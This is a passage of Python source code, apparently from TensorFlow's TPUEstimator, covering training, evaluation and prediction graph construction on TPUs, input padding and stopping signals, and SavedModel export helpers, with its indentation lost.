table_to_config_dict = (
ctx.embedding_config.tpu_embedding.table_to_config_dict)
optimization_parameters = (
ctx.embedding_config.tpu_embedding.optimization_parameters)
embedding_variable_name_by_table, slot_variable_names_by_table = (
_tpu_estimator_embedding.get_full_variable_names(
g, table_to_config_dict, optimization_parameters
)
)
embedding_variables_and_ops = (
ctx.embedding_config.tpu_embedding.create_variables_and_ops(
embedding_variable_name_by_table,
slot_variable_names_by_table
))
tpu_init_ops.extend(embedding_variables_and_ops.load_ops())
# scaffold_fn must be called after variables for TPU embedding has
# been created on CPU, as user might reinitialize those from some
# checkpoint within scaffold_fn.
scaffold = _get_scaffold(scaffold_fn)
host_ops = host_call.create_tpu_hostcall()
shutdown_hooks = []
shutdown_mode = os.environ.get('TF_TPU_GRACEFUL_SHUTDOWN_MODE',
'reset_computation')
if shutdown_mode:
if shutdown_mode == 'shutdown_worker':
finalizer_hooks = [
session_support.ShutdownLameWorkers(),
]
elif shutdown_mode == 'shutdown_all_workers':
finalizer_hooks = [
session_support.ShutdownAllWorkers(),
]
elif shutdown_mode == 'reset_computation':
finalizer_hooks = [
session_support.ResetComputation(),
]
elif not shutdown_mode:
finalizer_hooks = []
else:
raise ValueError(
'Unknown TF_TPU_GRACEFUL_SHUTDOWN_MODE "%s"' % shutdown_mode)
if finalizer_hooks:
shutdown_hooks.append(
session_support.GracefulShutdownHook(
checkpoint_prefix=self.model_dir + '/model.ckpt',
on_shutdown_hooks=finalizer_hooks))
with ops.control_dependencies([loss]):
global_step = array_ops.identity(training.get_global_step())
hooks = input_hooks + shutdown_hooks
hooks.extend([
TPUInfeedOutfeedSessionHook(
ctx,
enqueue_ops,
host_ops,
tpu_compile_op=compile_op,
run_infeed_loop_on_coordinator=(
run_infeed_loop_on_coordinator),
rendezvous=self._rendezvous[mode],
master=self._config.master,
session_config=self._session_config,
tpu_init_ops=tpu_init_ops),
InstallSignalHandlerHook()
])
if tpu_cluster_resolver.is_running_in_gce():
hooks.extend(
[preempted_hook.CloudTPUPreemptedHook(self._config.cluster)])
if (self._log_every_n_steps is not None
or self._log_every_n_secs is not None):
if self._iterations_per_training_loop.unit == 'count':
examples_hook._set_steps_per_run( # pylint: disable=protected-access
self._iterations_per_training_loop.value)
hooks.append(training.LoggingTensorHook(
{
'loss': array_ops.identity(loss),
'step': global_step,
},
every_n_iter=self._log_every_n_steps,
every_n_secs=self._log_every_n_secs))
hooks.append(examples_hook)
if training_hooks:
hooks.extend(training_hooks)
chief_hooks = []
if (self._config.save_checkpoints_secs or
self._config.save_checkpoints_steps):
checkpoint_hook = training.CheckpointSaverHook(
self.model_dir,
save_secs=self._config.save_checkpoints_secs,
save_steps=self._config.save_checkpoints_steps,
scaffold=scaffold)
if self._iterations_per_training_loop.unit == 'count':
checkpoint_hook._set_steps_per_run( # pylint: disable=protected-access
self._iterations_per_training_loop.value)
else:
# When estimating iterations_per_loop, set steps_per_run to an
# arbitrarily high number to force checking the global step on
# every call.
# TODO(henrytan): refactor SecondOrStepTimer to do this more
# explicitly.
checkpoint_hook._set_steps_per_run( # pylint: disable=protected-access
100000)
chief_hooks.append(checkpoint_hook)
summary.scalar(model_fn_lib.LOSS_METRIC_KEY, loss)
with ops.control_dependencies([loss]):
update_ops = _sync_variables_ops(ctx)
if ctx.embedding_config:
update_ops.extend(embedding_variables_and_ops.retrieve_ops())
# Validate the TPU training graph to catch basic errors
_validate_tpu_training_graph()
train_op = control_flow_ops.group(*update_ops)
graph.add_to_collection(_TPU_TRAIN_OP, train_op)
return model_fn_lib.EstimatorSpec(
mode,
loss=loss,
training_chief_hooks=chief_hooks,
training_hooks=hooks,
train_op=train_op,
scaffold=scaffold)
if mode == model_fn_lib.ModeKeys.EVAL:
compile_op, total_loss, host_calls, scaffold_fn, eval_hooks = (
_eval_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn))
if ctx.embedding_config:
g = ops.get_default_graph()
table_to_config_dict = (
ctx.embedding_config.tpu_embedding.table_to_config_dict)
embedding_variable_name_by_table, _ = (
_tpu_estimator_embedding.get_full_variable_names(
g, table_to_config_dict)
)
embedding_variables_and_ops = (
ctx.embedding_config.tpu_embedding.create_variables_and_ops(
embedding_variable_name_by_table
))
tpu_init_ops.extend(embedding_variables_and_ops.load_ops())
# scaffold_fn must be called after variables for TPU embedding has
# been created on CPU, as user might reinitialize those from some
# checkpoint within scaffold_fn.
scaffold = _get_scaffold(scaffold_fn)
iterations_per_loop_var = _create_or_get_iterations_per_loop()
mean_loss = math_ops.div(
total_loss,
math_ops.cast(iterations_per_loop_var, dtype=total_loss.dtype))
with ops.control_dependencies([mean_loss]):
# After TPU evaluation computation is done (the mean_loss tensor),
# reads all variables back from TPU and updates the eval step
# counter properly
internal_ops_to_run = _sync_variables_ops(ctx)
internal_ops_to_run.append(
_increase_eval_step_op(iterations_per_loop_var))
host_call_ret = host_calls.create_tpu_hostcall()
eval_metric_ops = {}
eval_update_ops = []
eval_metrics = host_call_ret.get('eval_metrics', {})
if eval_metrics:
# Creates a dummy metric update_op for all metrics. Estimator
# expects all metrics in `eval_metric_ops` have update_op and calls
# them one by one. The real metric update_ops are invoked in a
# separated thread. So, here give Estimator the dummy op for all
# metrics.
with ops.control_dependencies(internal_ops_to_run):
dummy_update_op = control_flow_ops.no_op()
for k, v in eval_metrics.items():
eval_metric_ops[k] = (v[0], dummy_update_op)
eval_update_ops.append(v[1])
else:
# If no eval metrics are passed, create an identity node for the
# loss and add `internal_ops_to_run` to its dependencies. So
# `internal_ops_to_run` can be executed.
with ops.control_dependencies(internal_ops_to_run):
mean_loss = array_ops.identity(mean_loss)
if 'host_call' not in host_call_ret:
host_ops = []
else:
host_ops = host_call_ret['host_call']
hooks = [
TPUInfeedOutfeedSessionHook(
ctx,
enqueue_ops,
eval_update_ops + host_ops,
tpu_compile_op=compile_op,
run_infeed_loop_on_coordinator=(
run_infeed_loop_on_coordinator),
rendezvous=self._rendezvous[mode],
master=self._config.evaluation_master,
session_config=self._session_config,
tpu_init_ops=tpu_init_ops)
] + input_hooks
if tpu_cluster_resolver.is_running_in_gce():
hooks.extend(
[preempted_hook.CloudTPUPreemptedHook(self._config.cluster)])
if eval_hooks:
hooks.extend(eval_hooks)
return model_fn_lib.EstimatorSpec(
mode,
loss=mean_loss,
evaluation_hooks=hooks,
eval_metric_ops=eval_metric_ops,
scaffold=scaffold)
# Predict
assert mode == model_fn_lib.ModeKeys.PREDICT
(compile_op, dummy_predict_op, host_calls,
scaffold_fn, prediction_hooks) = _predict_on_tpu_system(
ctx, model_fn_wrapper, dequeue_fn)
scaffold = _get_scaffold(scaffold_fn)
with ops.control_dependencies([dummy_predict_op]):
internal_ops_to_run = _sync_variables_ops(ctx)
with ops.control_dependencies(internal_ops_to_run):
dummy_predict_op = control_flow_ops.no_op()
# In train and evaluation, the main TPU program is passed to monitored
# training session to run. Infeed enqueue and outfeed dequeue are
# executed in side threads. This is not the configuration for
# prediction mode.
#
# For prediction, the Estimator executes the EstimatorSpec.predictions
# directly and yield the element (via generator) to call site. So, the
# outfeed based prediction must be passed to MonitoredSession directly.
# Other parts of the TPU execution are organized as follows.
#
# 1. All outfeed based Tensors must be grouped with predictions Tensors
# to form a single invocation. This avoid the issue we might trigger
# multiple outfeeds incorrectly. To achieve this, `host_call` is
# placed in control_dependencies of `stopping_signals`, and
# `stopping_signals` is passed into _StoppingPredictHook, which sets
# the `stopping_signals` as SessionRunArgs. MonitoredSession merges
# all SessionRunArgs with the fetch in session.run together.
#
# 2. The TPU program (dummy_predict_op) and enqueue_ops (infeed Enqueue)
# are grouped together. They will be launched once and only once in
# side threads and they quit naturally according to the SAME stopping
# condition.
enqueue_ops.append(dummy_predict_op)
host_call_ret = host_calls.create_tpu_hostcall()
if 'host_call' not in host_call_ret:
host_ops = []
else:
host_ops = host_call_ret['host_call']
predictions = host_call_ret['predictions']
_verify_cross_hosts_transfer_size(
predictions,
message=(
'The estimated size for TPUEstimatorSpec.predictions is too '
'large.'))
signals = host_call_ret['signals']
with ops.control_dependencies(host_ops):
host_ops = [] # Empty, we do do not need it anymore.
scalar_stopping_signal = _StopSignals.as_scalar_stopping_signal(
signals)
predictions = _PaddingSignals.slice_tensor_or_dict(
predictions, signals)
hooks = [
_StoppingPredictHook(scalar_stopping_signal),
TPUInfeedOutfeedSessionHookForPrediction(
ctx, enqueue_ops, host_ops, rendezvous=self._rendezvous[mode],
tpu_compile_op=compile_op,
master=self._config.master,
session_config=self._session_config),
] + input_hooks
if prediction_hooks:
hooks.extend(prediction_hooks)
return model_fn_lib.EstimatorSpec(
mode,
prediction_hooks=hooks,
predictions=predictions,
scaffold=scaffold)
return _model_fn
def _export_output_to_tensors(export_output):
"""Get a list of `Tensors` used in `export_output`.
Args:
export_output: an `ExportOutput` object such as `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
Returns:
a list of tensors used in export_output.
Raises:
ValueError: if `export_output` is not one of `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
"""
if isinstance(export_output, export_output_lib.ClassificationOutput):
return [export_output.scores, export_output.classes]
elif isinstance(export_output, export_output_lib.RegressionOutput):
return [export_output.value]
elif isinstance(export_output, export_output_lib.PredictOutput):
return list(export_output.outputs.values())
else:
raise ValueError(
'`export_output` must be have type `ClassificationOutput`, '
'`RegressionOutput`, or `PredictOutput`; got {}.'.format(export_output))
def _clone_export_output_with_tensors(export_output, tensors):
"""Clones `export_output` but with new `tensors`.
Args:
export_output: an `ExportOutput` object such as `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
tensors: a list of `Tensors` used to construct a new `export_output`.
Returns:
A dict similar to `export_output` but with `tensors`.
Raises:
ValueError: if `export_output` is not one of `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
"""
if isinstance(export_output, export_output_lib.ClassificationOutput):
if len(tensors) != 2:
raise ValueError('tensors must be of length 2; '
'got {}.'.format(len(tensors)))
return export_output_lib.ClassificationOutput(*tensors)
elif isinstance(export_output, export_output_lib.RegressionOutput):
if len(tensors) != 1:
raise ValueError('tensors must be of length 1; '
'got {}'.format(len(tensors)))
return export_output_lib.RegressionOutput(*tensors)
elif isinstance(export_output, export_output_lib.PredictOutput):
return export_output_lib.PredictOutput(
dict(zip(export_output.outputs.keys(), tensors)))
else:
raise ValueError(
'`export_output` must be have type `ClassificationOutput`, '
'`RegressionOutput`, or `PredictOutput`; got {}.'.format(export_output))
def _eval_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
iterations_per_loop_var = _create_or_get_iterations_per_loop()
(single_tpu_eval_step, host_calls, captured_scaffold_fn, captured_eval_hooks
) = model_fn_wrapper.convert_to_single_tpu_eval_step(dequeue_fn)
@tpu_function.on_device_training_loop
def multi_tpu_eval_steps_on_single_shard():
return training_loop.repeat(iterations_per_loop_var, single_tpu_eval_step,
[_ZERO_LOSS])
(compile_op, loss,) = tpu.split_compile_and_shard(
multi_tpu_eval_steps_on_single_shard,
inputs=[],
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
loss = loss[0]
return (compile_op, loss, host_calls, captured_scaffold_fn,
captured_eval_hooks.get())
def _train_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
iterations_per_loop_var = _create_or_get_iterations_per_loop()
(single_tpu_train_step, host_call, captured_scaffold_fn,
captured_training_hooks) = (
model_fn_wrapper.convert_to_single_tpu_train_step(dequeue_fn))
@tpu_function.on_device_training_loop
def multi_tpu_train_steps_on_single_shard():
return training_loop.repeat(iterations_per_loop_var, single_tpu_train_step,
[_INITIAL_LOSS])
(compile_op, loss,) = tpu.split_compile_and_shard(
multi_tpu_train_steps_on_single_shard,
inputs=[],
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
loss = loss[0]
return (compile_op, loss, host_call, captured_scaffold_fn,
captured_training_hooks.get())
def _predict_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
(single_tpu_predict_step, host_calls, captured_scaffold_fn,
captured_predict_hooks
) = model_fn_wrapper.convert_to_single_tpu_predict_step(dequeue_fn)
@tpu_function.on_device_training_loop
def multi_tpu_predict_steps_on_single_shard():
def cond(scalar_stopping_signal):
return math_ops.logical_not(
_StopSignals.should_stop(scalar_stopping_signal))
inputs = [_StopSignals.NON_STOPPING_SIGNAL]
outputs = training_loop.while_loop(
cond, single_tpu_predict_step, inputs=inputs, name=b'loop')
return outputs
(compile_op, dummy_predict_op,) = tpu.split_compile_and_shard(
multi_tpu_predict_steps_on_single_shard,
inputs=[],
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
dummy_predict_op = dummy_predict_op[0]
return (compile_op, dummy_predict_op, host_calls, captured_scaffold_fn,
captured_predict_hooks.get())
def _wrap_computation_in_while_loop(device, op_fn):
"""Wraps the ops generated by `op_fn` in tf.while_loop."""
def computation(i):
with ops.control_dependencies(op_fn()):
return i + 1
iterations_per_loop_var = _create_or_get_iterations_per_loop()
# By setting parallel_iterations=1, the parallel execution in while_loop is
# basically turned off.
with ops.device(device):
iterations = array_ops.identity(iterations_per_loop_var)
return control_flow_ops.while_loop(
lambda i: i < iterations,
computation, [constant_op.constant(0)],
parallel_iterations=1)
def _wrap_computation_in_while_loop_with_stopping_signals(device, op_fn):
"""Wraps the ops generated by `op_fn` in tf.while_loop."""
def cond(scalar_stopping_signal):
return math_ops.logical_not(
_StopSignals.should_stop(scalar_stopping_signal))
def computation(unused_scalar_stopping_signal):
return_value = op_fn()
execute_ops = return_value['ops']
signals = return_value['signals']
with ops.control_dependencies(execute_ops):
return _StopSignals.as_scalar_stopping_signal(signals)
# By setting parallel_iterations=1, the parallel execution in while_loop is
# basically turned off.
with ops.device(device):
return control_flow_ops.while_loop(
cond,
computation, [_StopSignals.NON_STOPPING_SIGNAL],
parallel_iterations=1)
def _validate_tpu_training_graph():
"""Validate graph before running distributed training.
Raises:
ValueError: If the graph seems invalid for running on device
"""
if control_flow_util.ENABLE_CONTROL_FLOW_V2:
return # b/124241278
operations = ops.get_default_graph().get_operations()
# Check if there is atleast one CrossReplicaSum operation in the graph
# This should be introduced by using the CrossShardOptimizer wrapper
cross_replica_sum_ops = [
o for o in operations if o.type == _CROSS_REPLICA_SUM_OP
]
if not cross_replica_sum_ops:
raise ValueError(
'CrossShardOptimizer must be used for model training on TPUs.')
class _CapturedObject(object):
"""A placeholder to capture an object.
This is useful when we need to capture a Python object in the Tensorflow
control flow body function and use it outside the control flow.
"""
def __init__(self):
self._object = None
self._captured = False
def capture(self, o):
if self._captured:
raise RuntimeError(
'InternalError: Object can capture only once. Please file bug.')
self._captured = True
self._object = o
def get(self):
if not self._captured:
raise RuntimeError(
'InternalError: Object is not captured properly before `get`. '
'Please file bug.')
return self._object
def _get_scaffold(captured_scaffold_fn):
"""Retrieves the Scaffold from `captured_scaffold_fn`."""
with _CapturingContext(message='Inside scaffold_fn'):
scaffold_fn = captured_scaffold_fn.get()
if scaffold_fn:
scaffold = scaffold_fn()
if scaffold is None:
raise ValueError(
'TPUEstimatorSpec.scaffold_fn returns None, which is not allowed')
else:
scaffold = None
if scaffold:
wrapped_finalize = scaffold.finalize
def _finalize():
with _CapturingContext('Inside Scaffold.finalize'):
wrapped_finalize()
scaffold.finalize = _finalize
return scaffold
class _CapturingContext(control_flow_ops.ControlFlowContext):
"""Tracks references to Tensors defined in TPU replication."""
def __init__(self, message):
control_flow_ops.ControlFlowContext.__init__(self)
self._message = message
def to_control_flow_context_def(self, context_def, export_scope=None):
# pylint: disable=useless-super-delegation
# NOTE(slebedev): the method is required by `ControlFlowContext`.
super(_CapturingContext, self).to_control_flow_context_def(
context_def, export_scope)
def AddOp(self, op): # pylint: disable=invalid-name
for c in op.inputs:
if tpu._TPU_REPLICATE_ATTR in c.op.node_def.attr: # pylint: disable=protected-access
raise ValueError('{}: Op {} depends on TPU computation {}, '
'which is not allowed.'.format(self._message, op, c))
def __enter__(self):
# pylint: disable=protected-access
self._g = ops.get_default_graph()
self._old = self._g._get_control_flow_context()
self._g._set_control_flow_context(self)
# pylint: enable=protected-access
def __exit__(self, _, __, ___): # pylint: disable=invalid-name
self._g._set_control_flow_context(self._old) # pylint: disable=protected-access
class _Inputs(object):
"""A data structure representing the input_fn returned values.
This also supports the returned value from input_fn as `Dataset`.
"""
def __init__(self, features=None, labels=None, dataset=None, signals=None):
if dataset is not None and (features is not None or labels is not None or
signals is not None):
raise RuntimeError('Internal Error: Either (features and labels) or '
'dataset should be provided, not both. Please file '
'bug')
self._features = features
self._labels = labels
self._signals = signals
self._dataset = dataset
self._iterator = None
@staticmethod
def from_input_fn(return_values):
"""Returns an `_Inputs` instance according to `input_fn` return value."""
if isinstance(return_values, dataset_ops.DatasetV2):
dataset = return_values
return _Inputs(dataset=dataset)
features, labels = _Inputs._parse_inputs(return_values)
return _Inputs(features, labels)
@staticmethod
def _parse_inputs(return_values):
if isinstance(return_values, tuple):
features, labels = return_values
else:
features, labels = return_values, None
return features, labels
@property
def is_dataset(self):
"""Returns True if the return value from input_fn is Dataset."""
return self._dataset is not None
def dataset_initializer(self):
"""Returns the dataset's initializer.
The initializer must be run before calling `features_and_labels`.
"""
self._iterator = dataset_ops.make_initializable_iterator(self._dataset)
return self._iterator.initializer
def features_and_labels(self):
"""Gets `features` and `labels`."""
if self.is_dataset:
if self._iterator is None:
raise RuntimeError('Internal error: Must run dataset_initializer '
'before calling features_and_labels(). Please file '
'a bug!')
return _Inputs._parse_inputs(self._iterator.get_next())
return (self._features, self._labels)
def signals(self):
return self._signals
@property
def dataset(self):
return self._dataset
class _InputsWithStoppingSignals(_Inputs):
"""Inputs with `_StopSignals` inserted into the dataset."""
def __init__(self,
dataset,
batch_size,
add_padding=False,
num_invocations_per_step=1):
assert dataset is not None
user_provided_dataset = dataset.map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=False, batch_size=batch_size, add_padding=add_padding))
if num_invocations_per_step == 1:
final_batch_dataset = dataset.take(1).map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=True, batch_size=batch_size, add_padding=add_padding))
else:
# We append (2 * num_invocations_per_step - 1) batches for exhausting the
# user_provided_dataset and stop properly.
# For example, if num_invocations_per_step is 2, we append 3 additional
# padding batches: b1, b2, b3.
# If user_provided_dataset contains two batches: a1, a2
# Step 1: [a1, a2]
# Step 2: [b1, b2] -> STOP
# If user_provided_dataset contains three batches: a1, a2, a3.
# The training loops:
# Step 1: [a1, a2]
# Step 2: [a3, b1]
# Step 3: [b2, b3] -> STOP.
final_batch_dataset = dataset.take(1).map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=True, batch_size=batch_size, add_padding=add_padding))
final_batch_dataset = final_batch_dataset.repeat(
2 * num_invocations_per_step - 1)
def _set_mask(data_dict):
signals = data_dict['signals']
signals['padding_mask'] = array_ops.ones_like(signals['padding_mask'])
data_dict['signals'] = signals
return data_dict
# Mask out the extra batch.
final_batch_dataset = final_batch_dataset.map(_set_mask)
dataset = user_provided_dataset.concatenate(final_batch_dataset).prefetch(2)
super(_InputsWithStoppingSignals, self).__init__(dataset=dataset)
self._current_inputs = None
def features_and_labels(self):
if self._current_inputs is not None:
raise RuntimeError(
'Internal Error: The previous inputs have not been properly '
'consumed. First call features_and_labels, then call signals.')
inputs_with_signals = self._iterator.get_next()
features = inputs_with_signals['features']
labels = inputs_with_signals.get('labels')
self._current_inputs = inputs_with_signals
return features, labels
def signals(self):
"""Returns the `Signals` from `_Inputs`."""
if self._current_inputs is None:
raise RuntimeError(
'Internal Error: The current inputs have not been properly '
'generated. First call features_and_labels, then call signals.')
signals = self._current_inputs['signals']
self._current_inputs = None
return signals
@staticmethod
def insert_stopping_signal(stop, batch_size, add_padding=False):
"""Inserts stopping_signal into dataset via _map_fn.
Here we change the data structure in the dataset, such that the return value
is a dictionary now and `features`, `labels`, and `signals` are three
distinguished keys in that dict. This provides a better structure, which
eases the process to decompose the inputs (see `features_and_labels`).
Args:
stop: bool, state of current stopping signals.
batch_size: int, batch size.
add_padding: bool, whether to pad the tensor to full batch size.
Returns:
A map_fn passed to dataset.map API.
"""
def _map_fn(*args):
"""The map fn to insert signals."""
if len(args) == 1:
# Unpack the single Tensor/dict argument as features. This is required
# for the input_fn returns no labels.
args = args[0]
features, labels = _Inputs._parse_inputs(args)
new_input_dict = {}
if add_padding:
padding_mask, features, labels = (
_PaddingSignals.pad_features_and_labels(features, labels,
batch_size))
new_input_dict['features'] = features
if labels is not None:
new_input_dict['labels'] = labels
else:
new_input_dict['features'] = features
if labels is not None:
new_input_dict['labels'] = labels
padding_mask = None
new_input_dict['signals'] = _StopSignals(
stop=stop, batch_size=batch_size,
padding_mask=padding_mask).as_dict()
return new_input_dict
return _map_fn
class _StopSignals(object):
"""Signals class holding all logic to handle TPU stopping condition."""
NON_STOPPING_SIGNAL = False
STOPPING_SIGNAL = True
def __init__(self, stop, batch_size, padding_mask=None):
self._stop = stop
self._batch_size = batch_size
self._padding_mask = padding_mask
def as_dict(self):
"""Returns the signals as Python dict."""
shape = [self._batch_size, 1]
dtype = dtypes.bool
if self._stop:
stopping = array_ops.ones(shape=shape, dtype=dtype)
else:
stopping = array_ops.zeros(shape=shape, dtype=dtype)
signals = {'stopping': stopping}
if self._padding_mask is not None:
signals['padding_mask'] = self._padding_mask
return signals
@staticmethod
def as_scalar_stopping_signal(signals):
return array_ops.identity(signals['stopping'][0][0])
@staticmethod
def should_stop(scalar_stopping_signal):
"""Detects whether scalar_stopping_signal indicates stopping."""
if isinstance(scalar_stopping_signal, ops.Tensor):
# STOPPING_SIGNAL is a constant True. Here, the logical_and is just the TF
# way to express the bool check whether scalar_stopping_signal is True.
return math_ops.logical_and(scalar_stopping_signal,
_StopSignals.STOPPING_SIGNAL)
else:
# For non Tensor case, it is used in SessionRunHook. So, we cannot modify
# the graph anymore. Here, we use pure Python.
return bool(scalar_stopping_signal)
class _PaddingSignals(object):
"""Signals class holding all logic to handle padding."""
@staticmethod
def pad_features_and_labels(features, labels, batch_size):
"""Pads out the batch dimension of features and labels."""
real_batch_size = array_ops.shape(
_PaddingSignals._find_any_tensor(features))[0]
batch_size_tensor = constant_op.constant(batch_size, dtypes.int32)
check_greater = check_ops.assert_greater_equal(
batch_size_tensor,
real_batch_size,
data=(batch_size_tensor, real_batch_size),
message='The real batch size should not be greater than batch_size.')
with ops.control_dependencies([check_greater]):
missing_count = batch_size_tensor - real_batch_size
def pad_single_tensor(tensor):
"""Pads out the batch dimension of a tensor to the complete batch_size."""
rank = len(tensor.shape)
assert rank > 0
padding = array_ops.stack([[0, missing_count]] + [[0, 0]] * (rank - 1))
padded_shape = (batch_size,) + tuple(tensor.shape[1:])
padded_tensor = array_ops.pad(tensor, padding)
padded_tensor.set_shape(padded_shape)
return padded_tensor
def nest_pad(tensor_or_dict):
return nest.map_structure(pad_single_tensor, tensor_or_dict)
features = nest_pad(features)
if labels is not None:
labels = nest_pad(labels)
padding_mask = _PaddingSignals._padding_mask(real_batch_size, missing_count,
batch_size)
return padding_mask, features, labels
@staticmethod
def slice_tensor_or_dict(tensor_or_dict, signals):
"""Slice the real Tensors according to padding mask in signals."""
padding_mask = signals['padding_mask']
batch_size = array_ops.shape(padding_mask)[0]
def verify_batch_size(tensor):
check_batch_size = math_ops.equal(batch_size, tensor.shape[0])
with ops.control_dependencies([check_batch_size]):
return array_ops.identity(tensor)
def slice_single_tensor(tensor):
rank = len(tensor.shape)
assert rank > 0
real_batch_size = batch_size - math_ops.reduce_sum(padding_mask)
return verify_batch_size(tensor)[0:real_batch_size]
# As we split the Tensors to all TPU cores and concat them back, it is
# important to ensure the real data is placed before padded ones, i.e.,
# order is preserved. By that, the sliced padding mask should have all 0's.
# If this assertion failed, # the slice logic here would not hold.
sliced_padding_mask = slice_single_tensor(padding_mask)
assert_padding_mask = math_ops.equal(
math_ops.reduce_sum(sliced_padding_mask), 0)
with ops.control_dependencies([assert_padding_mask]):
should_stop = _StopSignals.should_stop(
_StopSignals.as_scalar_stopping_signal(signals))
is_full_batch = math_ops.equal(math_ops.reduce_sum(padding_mask), 0)
def slice_fn(tensor):
# If the current batch is full batch or part of stopping signals, we do
# not need to slice to save performance.
return control_flow_ops.cond(
math_ops.logical_or(should_stop, is_full_batch),
(lambda: verify_batch_size(tensor)),
(lambda: slice_single_tensor(tensor)))
return nest.map_structure(slice_fn, tensor_or_dict)
@staticmethod
def _find_any_tensor(batch_features):
tensors = [
x for x in nest.flatten(batch_features) if isinstance(x, ops.Tensor)
]
if not tensors:
raise ValueError('Cannot find any Tensor in features dict.')
return tensors[0]
@staticmethod
def _padding_mask(real_batch_size, missing_count, batch_size):
padding_mask = array_ops.concat([
array_ops.zeros((real_batch_size,), dtype=dtypes.int32),
array_ops.ones((missing_count,), dtype=dtypes.int32)
],
axis=0)
padding_mask.set_shape((batch_size,))
return padding_mask
def _verify_cross_hosts_transfer_size(tensor_dict, message):
total_size = 0
tensor_structure = {}
for key, tensor in tensor_dict.items():
shape = tensor.shape
size = np.product(shape) * tensor.dtype.size
tensor_structure[key] = shape
total_size += size
if total_size >= _ONE_GIGABYTE:
raise ValueError(
'{} The transfer size is larger than the protobuf limit. Please '
'consider to use Tensors with smaller shapes or reduce batch '
'size. Given:\n'
'{}'.format(
message, '\n'.join([
' -- Key: {}, Shape: {}'.format(k, v)
for k, v in tensor_structure.items()
])))
def _add_item_to_params(params, key, value):
"""Adds a new item into `params`."""
if hasattr(params, 'set_hparam'):
# For HParams, we need to use special API.
if key in params:
params.set_hparam(key, value)
else:
params.add_hparam(key, value)
else:
# Now params is Python dict.
params[key] = value
def export_estimator_savedmodel(estimator,
export_dir_base,
serving_input_receiver_fn,
assets_extra=None,
as_text=False,
checkpoint_path=None):
"""Export `Estimator` trained model for TPU inference.
Args:
estimator: `Estimator` with which model has been trained.
export_dir_base: A string containing a directory in which to create
timestamped subdirectories containing exported SavedModels.
serving_input_receiver_fn: A function that takes no argument and returns a
`ServingInputReceiver` or `TensorServingInputReceiver`.
assets_extra: A dict specifying how to populate the assets.extra directory
within the exported SavedModel, or `None` if no extra assets are needed.
as_text: whether to write the SavedModel proto in text format.
checkpoint_path: The checkpoint path to export. If `None` (the default),
the most recent checkpoint found within the model directory is chosen.
Returns:
The string path to the exported directory.
"""
# `TPUEstimator` requires `tpu_config.RunConfig`, so we cannot use
# `estimator.config`.
config = tpu_config.RunConfig(model_dir=estimator.model_dir)
est = TPUEstimator(
estimator._model_fn, # pylint: disable=protected-access
config=config,
params=estimator.params,
use_tpu=True,
train_batch_size=2048, # Does not matter.
eval_batch_size=2048, # Does not matter.
)
return est.export_saved_model(export_dir_base, serving_input_receiver_fn,
assets_extra, as_text, checkpoint_path)
def model_fn_inference_on_tpu(model_fn,
features,
labels=None,
config=None,
params=None,
batch_config=None,
experimental_export_device_assignment=False,
call_context=None):
"""Convenience wrapper for export_saved_model API v2 for a model_fn.
It attempts to execute the entire model function on the TPU for prediction.
Note that this does not support features which are SparseTensors. If you have
SparseTensor features, consider partitioning your model function further and
use inference_on_tpu.
Args:
model_fn: the model_fn for which we want to inference on TPU.
features: a tensor or dict of tensors, serves as the feature inputs to the
model.
labels: a tensor or dict of tensors, serves as the labels inputs to the
model.
config: auxiliary config to the Estimator.
params: hparams that we want to pass to the model_fn.
batch_config: a named tuple to wrap the inference batching configuration
inputs.
experimental_export_device_assignment: Whether to include the device
assignment in the exported model. Doing so is useful in case of model
parallel inference but will tie the exported model to the TPU topology
used to export the model.
call_context: an optional TPUContext under which the TPU run configuartion
is stored.
Returns:
An EstimatorSpec containing the outputs in export_outputs and predictions.
"""
computation, capture = _build_computation_for_inference(
model_fn, labels, config, params, experimental_export_device_assignment,
call_context)
tensors = call_computation(
features,
computation,
experimental_export_device_assignment=
experimental_export_device_assignment,
batch_config=batch_config)
estimator_spec, export_outputs_dict, predictions_dict, none_indices = (
capture.get())
predictions_list = tensors[:len(predictions_dict)]
export_outputs_list_without_none = tensors[len(predictions_dict):]
# Reinsert `None`s which we've taken out in
# `_build_computation_for_inference()`.
export_outputs_list = []
while none_indices or export_outputs_list_without_none:
if none_indices and none_indices[0] == len(export_outputs_list):
export_outputs_list.append(None)
none_indices.pop(0)
else:
export_outputs_list.append(export_outputs_list_without_none.pop(0))
# Reconstruct `export_outputs` with updated tensors.
new_export_outputs_dict = nest.pack_sequence_as(export_outputs_dict,
export_outputs_list)
export_outputs = estimator_spec.export_outputs
new_export_outputs = collections.OrderedDict(
(k, _clone_export_output_with_tensors(export_outputs[k], v))
for k, v in six.iteritems(new_export_outputs_dict))
# Reconstruct `predictions` with updated tensors.
new_predictions = nest.pack_sequence_as(predictions_dict, predictions_list)
if (len(new_predictions) == 1 and
_KEY_WHEN_PREDICTIONS_IS_A_TENSOR in new_predictions):
new_predictions = new_predictions[_KEY_WHEN_PREDICTIONS_IS_A_TENSOR]
return estimator_spec._replace(
export_outputs=new_export_outputs, predictions=new_predictions)
def _build_computation_for_inference(model_fn,
labels,
config,
params,
experimental_export_device_assignment,
call_context=None):
"""Builds the computation with calls the model_fn for inference."""
capture = _CapturedObject()
def computation(computation_input):
"""Computation to be passed to `TPUPartitionedCall()`."""
tpu_computation, tpu_capture = _build_tpu_computation_for_inference(
model_fn, computation_input, labels, config, params)
if experimental_export_device_assignment and call_context:
# Export the device assignment as part of the model. This is useful for
# model parallel usecases where the model relies on the mapping between
# logical and physical devices.
with call_context.with_mode(_INFERENCE_ON_TPU_MODE) as ctx:
